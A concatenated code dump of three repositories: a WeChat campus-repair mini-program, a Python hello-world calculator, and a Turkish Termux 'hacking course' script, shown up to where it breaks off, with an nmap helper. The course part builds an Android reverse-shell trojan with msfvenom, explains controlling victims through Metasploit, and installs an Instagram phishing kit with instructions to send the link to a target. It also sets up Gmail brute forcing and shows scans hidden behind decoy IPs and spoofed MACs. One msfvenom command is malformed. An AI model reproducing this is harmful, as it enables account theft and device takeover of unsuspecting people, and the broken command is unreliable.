timestamp = timestamp / 1000;
var n = timestamp * 1000;
var datee = util.formatTime(new Date())
var no_pages = wx.getStorageSync('no')
var name_pages = wx.getStorageSync('name')
var phone_pages = wx.getStorageSync('phone')
var th=this; //成功后数据改变,复制对象
wx.request({
url: 'https://www.bbin.design/api/addpages.php',
header: {
'content-type':'application/json'
},
method: 'GET',
success: function(res) {
console.log(res);
th.setData({
list:res.data,
no_pages :no_pages,
name_pages :name_pages,
phone_pages :phone_pages,
id_pages:timestamp,
now_pages:datee
})
},
fail: function(res) {
console.log("-----fail-----");
},
})
},
// chooseImg:function(){
// var that = this;
// wx.chooseImage({
// count: 2, // 默认9
// sizeType: ['original', 'compressed'], // 可以指定是原图还是压缩图,默认二者都有
// sourceType: ['album', 'camera'], // 可以指定来源是相册还是相机,默认二者都有
// success: function (res) {
// // 返回选定照片的本地文件路径列表,tempFilePath可以作为img标签的src属性显示图片
// var tempFilePaths = res.tempFilePaths;
// console.log(res)
// that.setData({
// img_l:res.tempFilePaths
// })
// }
// })
// },
// up_img:function() {
// var that = this;
// wx.uploadFile({
// url: 'https://www.bbin.design/api/addimg.php', //接口
// filePath: that.data.img_l[0],
// name: 'file',
// formData: {
// 'user': 'test'
// },
// success: function (res) {
// wx.showToast({
// title: '上传成功',
// duration:500
// })
// var data = res.data;
// console.log(data);
// //do something
// },
// fail: function (error) {
// console.log(error);
// }
// })
// },
// preview_img:function(){
// wx.previewImage({
// current: this.data.img_l, // 当前显示图片的http链接
// urls: this.data.img_l // 需要预览的图片http链接列表
// })
// },
formSubmit: function (e) {
var that = this;
var formData = e.detail.value;
if (e.detail.value.addr_pages == null || e.detail.value.detail_pages == null || e.detail.value.grade_pages == null || e.detail.value.time_pages == null) {
wx.showToast({
title: '信息未填完整!',
icon: 'error',
duration: 1500
})
setTimeout(function () {
wx.hideToast()
}, 2000)
}
else{
wx.showLoading({
title: '网络请求中...',
duration:3000,
})
wx.request({
url: 'https://www.bbin.design/api/addpages.php',
data:formData,
header: {
"Content-Type": "application/x-www-form-urlencoded"
},
method: "POST",
data: {
id_pages: e.detail.value.id_pages,
now_pages: e.detail.value.now_pages,
name_pages:e.detail.value.name_pages,
no_pages:e.detail.value.no_pages,
phone_pages:e.detail.value.phone_pages,
addr_pages:e.detail.value.addr_pages,
detail_pages:e.detail.value.detail_pages,
grade_pages:e.detail.value.grade_pages,
time_pages:e.detail.value.time_pages,
},
success: function (res) {
if (res.data.status == 0) {
wx.showToast({
title: '提交失败!!',
icon: 'loading',
duration: 10000
})
} else {
wx.showToast({
title: '报修成功!',
icon: 'success',
duration:1000,
success: function () {
setTimeout(function () {
wx.reLaunch({
url: '/pages/detail_repairer/detail_repairer',
})
}, 1500);
var page = getCurrentPages().pop();
if (page == undefined || page == null) return;
page.onLoad();
},
})
}
}
})
}
}
})<file_sep>Page({
/**
* 页面的初始数据
*/
data: {
},
/**
* 生命周期函数--监听页面加载
*/
onLoad: function (options) {
var that = this
var no_repairer = wx.getStorageSync('no')
this.setData({
no_repairer:no_repairer
})
wx.request({
url: 'https://www.bbin.design/api/myinfo.php',
method:"get",
header: {
'content-type': 'application/json'
},
data:{
no_repairer:no_repairer,
},
success:function(res){
//console.log(res.data)
that.setData({
list:res.data
})
},
})
},
formSubmit: function (e) {
//首先是用var函数获取input的输入信息
var no_repairer = e.detail.value.no_repairer;
var pass_repairer = e.detail.value.pass_repairer;
var phone_repairer = e.detail.value.phone_repairer;
//判断一下这个人输入没,有一个没输入就用showToast提醒他下
if (pass_repairer == '' || phone_repairer == '' || phone_repairer == null || phone_repairer == null ) {
wx.showToast({
title: '信息未修改',
icon: 'error',
duration: 1000
})
}
//接下来开始修改密码showLoading是让客户们稍等片刻
else {
wx.showLoading({
title: '网络请求中...',
})
//wx.request是微信小程序发送到后台的一种方式
wx.request({
url: "https://www.bbin.design/api/changemyinfo.php",//写清楚你要调用哪一个后台文件
method: 'POST',//method有两种方式,发送一般用POST,接收一般用GET
data: {//data里面的数据你把它当成一个快递,包装所有文件然后发送出去
no_repairer:no_repairer,
pass_repairer:pass_repairer,
phone_repairer:phone_repairer,
},
header: {
'content-type': 'application/x-www-form-urlencoded'
},
success: (res) => {//当成功的时候使用success函数进行下一步
console.log(res);//console.log类似c语言的printf,c++的cout,python的print。主要是用来调试的,后期可以删掉。
if (res.data.error) {//res.data.error的意思是如果数据错误
wx.showToast({
icon: 'none',
duration: 2000,
})
} else {
wx.showToast({
title:"请重新登陆!",
icon: 'success',//这里用success可以在客户成功修改后弹出一个√
duration: 1000,//duration是等待,1000为1秒
success: function () {
setTimeout(function () {
wx.reLaunch({
url: '/pages/index/index',//成功修改密码后我们返回登录界面(登录界面地址自行修改)
})
}, 2000)
}
})
}
}
})
}
},
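  // Hedged sketch (illustrative, not used by the code above): the repeated wx.request
  // boilerplate in this page could be wrapped in a small POST helper like the one below.
  // The parameter names here are assumptions for demonstration only.
  postForm: function (url, data, onSuccess) {
    wx.request({
      url: url,
      method: 'POST',
      header: { 'content-type': 'application/x-www-form-urlencoded' },
      data: data,
      success: onSuccess,
      fail: function (err) { console.log(err) }
    })
  },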
onReady: function () {
},
  /**
   * Lifecycle function -- listens for page show
   */
  onShow: function () {
  },
  /**
   * Lifecycle function -- listens for page hide
   */
  onHide: function () {
  },
  /**
   * Lifecycle function -- listens for page unload
   */
  onUnload: function () {
  },
  /**
   * Page event handler -- listens for the user's pull-down action
   */
  onPullDownRefresh: function () {
  },
  /**
   * Handler for the page reach-bottom event
   */
  onReachBottom: function () {
  },
  /**
   * User taps share in the top-right corner
   */
onShareAppMessage: function () {
}
})<file_sep># campus_repair
Campus fault repair system based on wechat applet
test account:
1.repairer(account:201751701327;password:<PASSWORD>)
2.maintainer(account:001;password:<PASSWORD>)
3.administrator(account:root;password:<PASSWORD>)
<file_sep>const app = getApp()
Page({
data: {
currentTabIndex:0,
top:["新报修","待维修","已完成"]
},
toadd:function(){
wx.navigateTo({
url: '/pages/addpapes_repairer/addpages_repairer',
})
},
onTabsItemTap:function(event){
var that = this
var name_pages = wx.getStorageSync('name')
let index=event.currentTarget.dataset.index;
this.setData({
currentTabIndex:index
})
console.log(name_pages)
wx.request({
url: 'https://www.bbin.design/api/repairing_repairer.php',
data:{
name_repairer:name_pages
},
success:function(res){
console.log(res)
that.setData({
list2:res.data
})
}
})
wx.request({
url: 'https://www.bbin.design/api/repaired_repairer.php',
data:{
name_repairer:name_pages
},
success:function(res){
console.log(res)
that.setData({
list3:res.data
})
}
})
},
click:function(e){
var id_pages = e.currentTarget.dataset.id
var index = e.currentTarget.dataset.index
console.log(id_pages)
console.log(index)
wx.setStorageSync('id_pages', id_pages)
wx.navigateTo({
url: '/pages/detail_1_repairer/detail_1_repairer?index='+index,
})
},
onLoad: function () {
var that = this
var no_pages = wx.getStorageSync('no')
console.log(no_pages)
wx.request({
url: 'https://www.bbin.design/api/allrepairer.php',
      header: {
'content-type':'application/json'
},
data:{
no_pages:no_pages,
},
success: function (res) {
console.log(res.data)
        //store the fetched JSON data in the array named list
        that.setData({
          list: res.data,
          //res is the response object passed to the success callback; data is fixed, list is the array
})
}
})
},
onPullDownRefresh:function()
{
this.onLoad()
    wx.showNavigationBarLoading() //show a loading indicator in the title bar
    //simulate loading
    setTimeout(function()
    {
      // complete
      wx.hideNavigationBarLoading() //stop the title bar loading indicator
      wx.stopPullDownRefresh() //stop the pull-down refresh
},1500);
},
})
|
5ebacb7b298d7b4978cba153af6e8fb621aae863
|
[
"JavaScript",
"Markdown"
] | 7
|
JavaScript
|
CoffeeLin0101/campus_repair
|
099b00dd195e642674533a3b5a64f52900866522
|
aecb348f8492477f2ae845d195785ed15fe7f7ad
|
refs/heads/main
|
<file_sep>def add(num1, num2):
return num1 + num2
def substract(num1, num2):
return num1 - num2
<file_sep># hello-world
First public commit
<file_sep>import matplotlib
import hello_world as hw
import calculator as calc
def main():
hw.helloWorld()
print(calc.add(10, 20))
print(calc.substract(10, 20))
main()
|
9e5c7cdb7520ea8890e6496448f5c34d87da43ca
|
[
"Markdown",
"Python"
] | 3
|
Python
|
martintargaryen/hello-world
|
b1f28725016429c4b6ad5313113eb2e1480799ee
|
87a35c98b120b6d3d5b334a5a701206c51c2b5d3
|
refs/heads/main
|
<repo_name>asetrsaepdeneme/saep<file_sep>/TEğitim Döküman/6.DERS/Nmap_Pratik_Kullanım.py
#!usr/bin/env python
# -*- coding: utf-8 -*-
import os
os.system("apt install tcptraceroute")
os.system("apt install traceroute")
os.system("apt install figlet")
os.system("apt-get install nmap")
os.system("clear")
os.system("figlet MAKRO")
print("""Nmap pratik programına hoş geldiniz
1)Kısa Tarama
2)Port tarama
3)Agresif tarama
4)Gizli Tarama(mac adres)
5)Gizli Tarama(İP adres)
6)Hedef İşletim sistemini Öğrenme
7)Hedef Servis Sürümleni Öğrenme
8)Hedef Filitreleme Tespiti
9)Firewall Atlatma
""")
secim = raw_input("Lütfen Seçim Yapınız: ")
if(secim=="1"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap "+ hedef)
print("""
Terminalde Kullanımı İçin: nmap + hedef""")
elif(secim=="2"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap -sS -sV "+hedef )
print("""
Terminalde Kullanımı İçin: nmap -sS -sV + hedef""")
elif(secim=="3"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap -A "+hedef )
print("""
Terminalde Kullanımı İçin: nmap -A hedef""")
elif(secim=="4"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap 10.0.2.15 --spoof-mac 00:0B:DB:82:58:C3 "+ hedef)
print("""
Terminalde Kullanımı İçin: nmap --spoof-mac + MAC + hedef""")
elif(secim=="5"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap -D 172.16.58.3 " + hedef)
print("""
Terminalde Kullanımı İçin: nmap -D + sahte IP + hedef""")
elif(secim=="6"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap -sS "+ hedef)
print("""
Terminalde Kullanımı İçin: nmap -sS + hedef""")
elif(secim=="7"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap -sV "+ hedef)
print("""
Terminalde Kullanımı İçin: nmap -sV + hedef""")
elif(secim=="8"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap -sA "+ hedef)
print("""
Terminalde Kullanımı İçin: nmap -sA + hedef""")
elif(secim=="9"):
hedef = raw_input("Lütfen Hedef IP Giriniz: ")
os.system("nmap -f -f "+ hedef)
print("""
Terminalde Kullanımı İçin: nmap -f -f + hedef (-f parametresi firewallı daha kolay atlatmayı sağlar ama tarama süresini uzatır)""")
else:
print("Hatlı Seçim Yeniden Dene")
tek = raw_input("Tekrar Tarama Yapmak İstermisin y/n: ")
if(tek=="y"):
os.system("python Nmap_Pratik_Kullanım.py")
elif(tek=="n"):
print("Tekrar Görüşmek Üzere")
else:
print("Yanlış Seçim Program Kapatılıyor")
<file_sep>/TEğitim.py
#!usr/bin/env python3
#-*- coding:utf-8 -*-
import os
os.system("clear")
print("""
\033[94m
\033[1m
_____ _____ _ _ _
|_ _|__ _ __ _ __ ___ _ ___ __ | ____|__ _(_) |_(_)_ __ ___
| |/ _ \ '__| '_ ` _ \| | | \ \/ / | _| / _` | | __| | '_ ` _ \
| | __/ | | | | | | | |_| |> < | |__| (_| | | |_| | | | | | |
|_|\___|_| |_| |_| |_|\__,_/_/\_\ |_____\__, |_|\__|_|_| |_| |_|
|___/
\033[1m
\033[92m
Eğitime Hoşgeldiniz
1)Termux Nedir 2)Admin Panelleri Nasıl Bulunur
3)Tooları Nasıl indireceğiz 4)Trojan Nasıl Oluşturulur
5)Trojan Nasıl Dinlemeye Alınır 6)Nmap Nedir Nasıl Kullanılır
7)Gmail Hesaplarını Hackleme 8)İnstagram Hackleme Ve Mantıkları
9)Siteler Hakkında Bilgi Edinme 10)Sitelerde Açık Arama
11)Kamera Hackleme 12)Gizli Hesapları İnceleme
13)Yazılımcı Olmak İsteyenler 14)İnternet Hakkında
15)Kulanıcı Adından Hesap Bulma 16)DDos Nedir?
17)Nasıl DDoS Atılır 18)Ekstra Bilgi Ve Döküman
19)Parola Listesi Oluşturma 20)Kişiye Özel Parola Listesi Oluşturma
21)Bilgilendirme Ve Teşekkür
q)Çıkış
""")
ilk = input("Öğrenmek İstediğinizi Seçin: ")
if ilk=="1":
os.system("clear")
print("""\033[1m
\033[92m
Termux Android Telefonlardan Kendini hack Konusunda
Geliştirmek İsteyenler İçin Tasarlanmış Bir Debian
Tabanlı Telefon Uygulaması (IOS Desteklemez)
Termux İçinde Paket Yükleyicisi Sayesinde Birçok Şeyi
Kendi İçinde Kurabilir Bu Depolar "pkg ,apt ,apt-get" Şeklindedir
Bir Paket Yüklemek İsterseniz "pkg install paket-adı"
Şeklinde Yüklersiniz. Sizin Linux'da Yapacağınız İşlerin
5/4'ünü Yapabilir Bu Yüzden Bilgisayarı Olmayan
Hacker Olamaz Diye Birşey Yoktur. Akıllı Telefonu Olan
Herkes Hacker Olabilir.
""")
don = input("Ana Menüye Dönmek İstermisiniz[E/h]: ")
if don=="e" or don=="E":
os.system("python3 TEğitim.py")
elif don=="h" or don=="H":
exit()
elif ilk=="2":
os.system("clear")
print("""\033[1m
\033[92m
Öncelikle Admin Panel Nedir?
Admin Adından Anlaşılacağı Gibi
Admin Yetkisi Olanların Giriş Yapabileceği
Giriş Sistemidir. Giriş Sisteminde Bulunabilecek Açıklar
Genel Olarak SQL Ve Brute Force Olarak Karşımıza Çıkarlar.
İsterseniz Nasıl Admin Panel Bulunur Görelim
""")
dev = input("Devam Edilsin mi? [E/h] ")
if dev=="e" or dev=="E":
print("Önce Kullanıcağımız aracı indirelim")
os.system("sleep 3")
os.system("pkg install git")
os.chdir("/data/data/com.termux/files/home")
os.system("git clone https://github.com/saepsh/saepapf")
print("Şuan Gerekli Dosya İndirildi ")
os.system("sleep 3")
print("Kullanılan Komutları Eğitim İçinde Bulabilirsiniz.\nLütfen Onlarıda İnceleyin")
os.chdir("/data/data/com.termux/files/home/saepapf")
os.system("chmod 777 *")
os.system("python2 saepapf.py")
elif dev=="h" or dev=="H":
exit()
elif ilk=="3":
os.system("clear")
print("Toolar Zaten Otomatik Olarak Bu Eğitimde Kuruluyor Ama Ben Size <NAME> Yükleyeceğinizi Burada Detaylı Bir Şekilde Anlatacağım")
print("""\033[1m
\033[92m
Şimdi toolları en çok github.com adresinden indireceğiz buradan tooları indirmek için
önce git aracını kuruyoruz bunun için "pkg install git" yazabilirsiniz
git aracını kullanabilmek için "git clone <toolun linki>"
yani "git clone https://github.com/M49R0/MACRO.git" Şeklinde yazıcaksınız.
Sonra indirilen dosyanın içine girmek için "cd" komutunu kullanıyoruz
örneğin "cd MACRO" bu komutla eğer dosya orada ise dosyanın içine girecektir.
eğer dosyadan çıkmak ve ana dizine gizmek istiyorsanız sadece "cd" yazın.
Yok ben bir dizin aşağı gidicem diyorsanız o zaman "cd .." yazın.
Bir dosyanın içinde ne var görmek istiyorsanız "ls" yazın.
Bir Python dosyasını açmak için pythonun yüklü olması lazım
mesela "python örnek.py" ama bazen bazı python dosyaları
farklı oluyor. Mesela python3 python2 ilede açılan dosyalar var.
Shell ile yazılmış bir dosyayı ise "bash örnek.sh" şeklinde açabilirsiniz
""")
don = input("Ana Menüye Dönmek İstermisiniz[E/h]: ")
if don=="e" or don=="E":
os.system("python3 TEğitim.py")
elif don=="h" or don=="H":
exit()
elif ilk=="4":
os.system("clear")
print("""\033[1m\033[92m
Trojan Nedir?
Truva atı olarakda bilinen bu virüs çok zararlıdır.
En başta kötü bir niyetle yapılmamıştı.
Ama sonradan kötüye kullanılmaya Başladı
saldırganın herşeyi ele geçirebilme olasıığı %95'dir
Trojanı Nasıl oluştururum
Bunun için metasploit denen bir araca ihtiyacımız var
metasploit iki bölümden oluşuyor msfvenom ve msfconsole
msfvenom ile trojan hazırlanıyor
msfconsole ile trojanımızı dinleyip yönetiyoruz
Tafsilat:
Trojanlardan korunmak için bilmediğiniz uygulamaları
hemen indirip açmayın. İndirirseniz bile virüs taraması yapmadan açmayın
Şimdi <NAME> Gelelim
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="e" or dev=="E":
os.system("clear")
print("""\033[1m\033[92m
Şimdi Metasploit manual olarak kurulması gereken bir araç
Biz onu şimdi otomatik olarak kuracağız ama siz manual olarak kurulmasını
dökümanlar arasnda bulabilirsiniz.
""")
os.system("sleep 5")
os.chdir("/data/data/com.termux/files/home")
os.system("pkg install wget")
os.system("pkg install curl")
os.system("wget https://raw.githubusercontent.com/gushmazuko/metasploit_in_termux/master/metasploit.sh")
os.system("chmod 777 *")
os.system("./metasploit.sh")
os.chdir("/data/data/com.termux/files/home/metasploit-framework")
os.system("chmod 777 *")
print("""\033[1m\033[92m
Msfvenomu kullanmak için payloadları bilmeniz gerekir
payloadları öğrenmek için "./msfvenom --list-payload" yazın
bütün payloadları gösterecektir.
Ama ben sadece windows için olan payloadları görmek istiyorum döyorsanız
bu payloadları msfconsole'dan "search windows" yazarak windows için olan
payloanları görebilirsiniz mesela şimdi android için bir virüs hazırlayalım
""")
don = input("Devam Edilsin mi[E/h] ")
if don=="e" or don=="E":
os.system("clear")
ip = input("Local IP Adresinizi Girin (ifconfig yazınca çıkması lazım): ")
os.system("msfvenom -p android/meterpreter/reverse_tcp LHOST=" + ip + "LPORT=4163 -O trojan.apk")
print("""\033[1m\033[92m
Trojanımız 4163 portunu kullanıyor sadece kendi ağınızda kullanabilirsiniz.
sizin modeminize bağlı olmayan bir kişi bu bu trojanı açsa bile siz onu hackleyemezsiniz
ilerde nasıl trojanı dinleyeceğimizi gösteriyorum şimdilik bu kadar.
""")
don = input("Ana Menüye Dönmek İstermisiniz[E/h]: ")
if don=="e" or don=="E":
os.system("python3 TEğitim.py")
elif don=="h" or don=="H":
exit()
elif don=="h" or don=="H":
exit()
elif ilk=="5":
print("""\033[1m\033[92m
Bir Trojanı dinlemeye almak için önce msfconsole yazıp enter tuşuna
basıyoruz açıldıktan sonra "use exploit/multi/handler" yazıyoruz
bundan sonrada "set payload" yazıp payloadımızın adını yazıyoruz
önceki derste payloadımız "android/meterpreter/reverse_tcp" şeklindeydi
payloadımızı eklemek için "set" yazıyoruz set seçmek anlamına gelir
"set payload" yazarak payload seçeceğimizi belirtiyoruz.
Yani yazmamız gereken "set payload android/meterpreter/reverse_tcp" yazmak.
sonra "show options" yazıyoruz. Bunu yazarak payload için ayar yapacağız
sonrada "set LHOST <Kendi IP Adresiniz>" yani "set LHOST 192.168.1.32" gibi
sonrada "set LPORT 4163" yazın
Tafsilat: LHOST Nedir?
LHOST virüsü açan bir kişiden bağlantı geldiğinde bağlantıyı
hangi IP adresine göndereceğini belirtmek için kullanılır
LPORT Nedir?
LPORT Bağlantıyı hangi portlar üzerinden saldırgana göndereceğini
belirtmek için kullanılır
""")
don = input("Ana Menüye Dönmek İstermisiniz[E/h]: ")
if don=="e" or don=="E":
os.system("python3 TEğitim.py")
elif don=="h" or don=="H":
exit()
elif ilk=="6":
os.system("clear")
print("""\033[1m\033[92m
Nmap Nedir?
Nmap çok gelişmiş bir bilgi toplama aracıdır.
çok ayrıntılı bir araçtır kullanılması biraz zordur
Nmap Nasıl Kullanılır?
Benim github hesabıma bakarsanız nmap pratik kullanım aracı var
nasıl kullanıldığınıda gösteriyorum isterseniz kullanımına geçelim
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="E" or dev=="e":
print("\nönce nmap aracını yükleyelim")
os.system("sleep 3")
os.system("pkg install nmap")
print("\033[1m\033[92m\nnmap'i yüklemek için 'pkg install nmap' yazabilirsiniz şuan nmap yüklendi")
os.system("sleep 4")
print("\n\n'nmap google.com' şeklinde bir arama yazarsanız klasik bilgileri verir")
dev = input("\n\nDevam Edilsin mi [E/h] ")
if dev=="E" or dev=="e":
print("\033[1m\033[92m\n\n-sV parametresini kullanırsanız yani 'nmap -sV google.com' şeklinde yaparsanız portları\nve servis sürüm bilgilerini verir. Servis sürüm bilgileri çok önemlidir ileride anlıyacaksınız")
deva = input("Devam Edilsin mi [E/h] ")
if deva=="E" or deva=="e":
os.system("sleep 1")
print("\033[1m\033[92mnmap hedefe sorgu paket göndererek bilgi toplar ama bu paketlerde sizin IP adresiniz gözükür IP adresinizi gizlemek için\n-D yazarak sahte bir IP adresi yazarsanız IP adresinizi gizlersiniz.\nYani --> nmap google.com -D 192.168.127.12")
dev = input("\n\nDevam Edilsin mi [E/h] ")
if deva=="E" or deva=="e":
os.system("clear")
print("\033[1m\033[92mSorgu paketleri atarken mac adreslerimizde gözükür\n\nMAC ADRES NERDİR?\n\nMac adres donanımların fiziksel adresleridir yani neredeyse tam konumunuzdur\n\nMac adresimizi nasıl gizleriz \n\nnmap --spoof-mac 00:0B:DB:82:58:C3 Şeklinde bir sorgu yaparsanız mav adresiniz gözükmez.\nYani sahte mac adresi gözükür sahte mac adresi ile sizi bulamazlar")
print("\033[1m\033[92mDaha Fazla Ayrıntı için Nmap Pratik Kullanım Aracımı İnceleyebilirsiniz Bu Eğitim dökümanları arasında bulabilirsiniz")
an = input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if an=="e" or an=="E":
os.system("python3 TEğitim.py")
elif deva=="h" or deva=="H":
os.system("sleep 0")
quit()
elif deva=="h" or deva=="H":
os.system("sleep 0")
quit()
elif dev=="h" or dev=="H":
quit()
elif ilk=="7":
os.system("clear")
print("""\033[1m\033[92mÖncelikle Gmail Hesabına ne yaparsak hesabı ele geçiririz?
Hesaba Oltalama Saldırısı Yapılabilir
Brute Force Attack (Kaba Kuvvet Saldırısı) Yapılabilir
Oltalama Nedir?
Sosyal mühendislik olarakda geçen bu saldırı
kişiye bir link gönderilerek kişiyi kandırma odaklı bir saldırıdır
Brute Force Attack Nedir?
Bir Parola Listesi Oluşturarak hedef Giriş Sistemine Parola Deneme Saldırısı
Yapma Saldırısıdır Nasıl Parola Listesi Oluşturabileceğinizi Bu Kursda Görebilirsiniz
Not: Bu Dersi İşlemeden Önce Bir Parola Listesi Oluşturun
""")
dev = input("<NAME> mi [E/h] ")
if dev=="e" or dev=="E":
os.system("clear")
print("Şimdi Gerekli Şeyler dosyalar Yükleniyor")
os.system("sleep 2")
os.system("pkg install git")
os.system("apt update")
os.system("pkg install python")
os.system("termux-setup-storage")
print("Kullanıcağımız Araç Hunner")
os.system("sleep 1")
os.chdir("/sdcard")
os.system("git clone https://github.com/b3-v3r/Hunner")
print("Programı Telefonun Kendisine Yükledik termuxu tekrar\naçtığınızda cd /sdcard yazarak ulaşabilirsiniz")
os.system("sleep 3")
print("""\033[1m\033[92m
Gmail ve Hotmail Brute Force Videosu Var
Burada Eğer Yazı İle Anlatsam 1 Sayfalık Yazı Çıkar
Gökümanlar arasında Videoyu Bulabilirsiniz
Not: Bu Dersi İzlemeden Önce Bir Parola Listesi Oluşturun
""")
elif ilk=="8":
os.system("clear")
print("""\033[1m\033[92m
İnstagram Hesapları Nasıl Hacklenir?
Not: Bu Anlatacaklarım Bir Sanalcıdan Alıntıdır
İnstagram Hesabı Çalmak Sizi Hacker Yapmaz Ve İllegal Bir Yoldur
Buradan Öğrendikleriniz Ve Uyguladıklarınızdan Ben Sorumlu Değilim
Not: Devam etmeden önce cihazınızdan Hostpot (mobil erisim noktası) ayarını aktifleştirin.
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="e" or dev=="E":
os.system("clear")
print("""\033[1m\033[92m
1.Hack Yolu
Sosyal Mühendislik
En Etkili Yollardan Birisidir.
Kişiyi kandırarak ona birşey yaptırırsınız ve kişi bunun farkına varmaz
farkına varsa bile çok geç olucaktır
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="e" or dev=="E":
print("""\033[1m\033[92m
Sosyal Mühendislik Saldırısı Nasıl Yapılır?
Bunun için gerekli araçlar var aracı indirip kurduktan sonra araç ile bir link oluşturulur.
Bu link açıldığında kişinin IP adresi gözükür sayfa instagram sayfası gibidir oraya giriş yaparsınız
ve bilgiler saldırganın eline geçer.
Evet bu bir sosyal mühendislik. Başka sosyal mühendislik saldırılarıda var onları dökümanlardan bulabilirsiniz
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="e" or dev=="E":
print("Dilerseniz gerekli aracı indirmeye başıyalım")
os.system("sleep 2")
os.chdir("/data/data/com.termux/files/home")
os.system("git clone https://github.com/htr-tech/nexphisher.git")
os.chdir("/data/data/com.termux/files/home/nexphisher")
os.system("chmod 777 *")
os.system("./tmux_setup")
print("Kurulum Tamamlandı...")
os.system("sleep 3")
print("""\033[1m\033[92m
Aracı çalıştırmak için önce ana dizine cd komutu ile gidin.
Ardından cd nexphisher komutu ile dizine geçiş yapın.
Sonra ./nexphisher komutu ile aracı çalıştırıp instagram yazanı seçin
Daha Sonra ngrok yazanı tuşlayın ve bekleyin
Önünüze "lkdsfjslklkdfjsd.io" gibi bir link çıkıcaktır saçma sapan gelebilir
o linki kurbana gönderin bilgileri girdiğinde sizede gelecektir
Ayrıntılı Bilgilye Dökümanlardan Ulaşabilirsiniz
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="e" or dev=="E":
print("""\033[1m\033[92m
2. Hack Yolu
Brute Force Attack Saldırısı Nasıl Yapılır?
Brute Force Attack Saldırısının Mantığı Nedir?
Bir parola listesi oluşturarak programlar yardımı ile bu doğru şifre bulunana kadar
denemesidir. Bu saldırıyı yapmak için bir araca ve bir parola listesi lazımdır
ama bu zamanlarda doğru şekilde saldırı yapan bir araç yok.
büyük bir kısmı kendini güncellemiyor bu yüzden saldırılar başarısız oluyor.
Ama nasıl bu saldırının yapılacağını dökümanlarda gösteriyorum
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="e" or dev=="E":
print("""\033[1m\033[92m
3. Hack Yolu
Methodlar
Bu aslıda bir hackleme değildir. Bunlar biraz sosyal mühendislik
ve biraz açıklardan yararlanma olarak nitelendirilebilir
Methodları Dökümanlar arasında bulabilirsiniz.
""")
elif dev=="h" or dev=="H":
quit()
elif dev=="h" or dev=="H":
quit()
elif ilk=="9":
os.system("clear")
print("""\033[1m\033[92m
Siteler hakkında bilgi toplama 2 çeşide ayrılır.
1.Aktif Bilgi Toplama
2.Pasif Bilgi Tolama
Aktif Bilgi Toplama Nedir?
Aktif bilgi toplama bir sunucudan veya bir siteden sizin hareketleriniz izlenerek gizli dosyalara erişmeye çalışmaktır
Pasif Bilgi Toplama Nedir?
Pasif bilgi toplama halka açık olan bilgilerden yararlanmaktır.
Hangisi Daha iyi
Aktif bilgi toplama ne kadar riskli olsada fazla bilgi verir
bu yüzden pasif bilgi toplama pek tercih edilmez
ama aktif bilgi toplamada IP adresiniz ve mac adresleriniz gözükür
konumunuz bilinir aktif bilgi toplarken VPN açmaya dikkat edin
ve yasalara uyun
Pasif Bilgi Toplama Araçları
Whois
Shodan
TheHarvester
Traceroute
vs
Aktif Bilgi Toplama Araçları
nmap
owasp-zap
maltego
nslookup
vs
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="E" or dev=="e":
print("""\033[1m\033[92m
1)Whois 2)TheHarvester
3)Traceroute 4)nmap
5)owasp-zap 6)maltego
""")
sec = input("Seçim Yapınız: ")
if sec=="1":
print("""\033[1m\033[92m
Whois Nasıl Kullanılır?
Öncelikle Whois Nasıl İndirilir
"apt install whois" yazarak kurabilirsiniz
whois aracını çalıştırmak için "whois sahibinden.com" şeklinde arama yapabilirsiniz.
Daha fazla ayrıntı için dökümanlara göz atabilirsiniz
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif sec=="2":
print("""\033[1m\033[92m
TheHarvester Nasıl Kullanılır?
Dökümanlarda Bununla ilgili Bir Link Var Orada Herşey Gösteriliyor
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif sec=="3":
print("""\033[1m\033[92m
TraceRoute Nedir?
Traceroute Bir paketin hangi IP adresleri üzerinden hedefe gittiğini görmek için kullanılan bir araçtır.
Bir sorgupaketi gönderildiğinde ne tür gecikme oluyor nereden hangi IP adresleri hedef ile bağlantılı olduğunu gösteriyor.
Hedefte bir güvenlik duvarı varsa * * * şeklinde boş kalır yani bir güvenlik yazılımı olduğu anlaşılır.
TraceRoute Nasıl İndirilir?
Termuxda "pkg install tracepath" yazarak kurabilirsiniz.
Kullanımı "traceroute google.com" şeklindedir
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif sec=="4":
print("""\033[1m\033[92m
Nmap Aracının Kullanımı 6. dersde gösteriliyor
nmap pratik kullanım aracınıda kullanabilirsiniz
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif sec=="5":
print("""\033[1m\033[92m
owasp-zap aracı termuxda çalışmıyor ama dökümanlarda owasp
aracının kullanımını görebilirsiniz
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif sec=="6":
print("""\033[1m\033[92m
maltego aracı termuxda çalışmıyor ama dökümanlarda maltego
aracının kullanımını gösteren linkler olacaktır
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif ilk=="10":
os.system("clear")
print("""\033[1m\033[92m
Web Sitelerinde Ne Tür Açıklar Bulunur
XSS, SQL ENJEKSİYON, İFRAME, GET PUT AND DELETE,
